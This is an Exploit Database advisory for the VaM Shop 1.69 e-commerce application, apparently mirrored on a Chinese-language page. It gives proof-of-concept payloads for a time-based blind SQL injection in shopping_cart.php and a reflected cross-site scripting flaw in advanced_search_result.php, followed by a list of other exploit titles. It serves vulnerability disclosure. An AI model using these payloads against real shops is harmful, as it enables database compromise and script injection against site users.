vam shop 1.69 – Multiple Vulnerabilities

Exploit Database
14 阅读

作者： Security Effect Team

日期： 2012-10-31
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/22372/

Product: VaM Shop
Vendor: Vamsoft ( http://vamshop.ru/ ) 
Vulnerable Version: 1,69 and probably prior versions.
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: Security Effect Team(http://seceffect.tumblr.com/)


Vulnerability Details:
1. Blind SQL injection in shopping_cart.php in parameter product_id[]. 
PoC: 
POST /shopping_cart.php?action=update_product

cart_delete[]=2071&cart_quantity[]=1&old_qty[]=1&products_id[]=2071' and sleep(2)%3d%27

2. Multiple XSS(cross-site scripting).
PoC:
/advanced_search_result.php/o" onmouseover=prompt(123) //

Copyright (c) 2012. Security Effect.

last Exploits
vam shop 1.69 – Multiple Vulnerabilities的更多信息

TufinOS 2.17 Build 1193 – XML External Entity Injection：
WUZHI CMS 4.1.0 – ‘form[qq_10]’ Cross-Site Scripting：
Ubee EVW3200 – Multiple Persistent Cross-Site Scripting Vulnerabilities：
Social Site Generator 2.2 – Cross-Site Request Forgery (Add Admin)：
KnowledgeTree 3.5.2 Community Edition – Persistent Cross-Site Scripting：
Wikidforum 2.20 – Cross-Site Scripting：
Dokeos 2.2.1 – Blind SQL Injection：
pfSense Firewall 2.2.5 – Config File Cross-Site Request Forgery：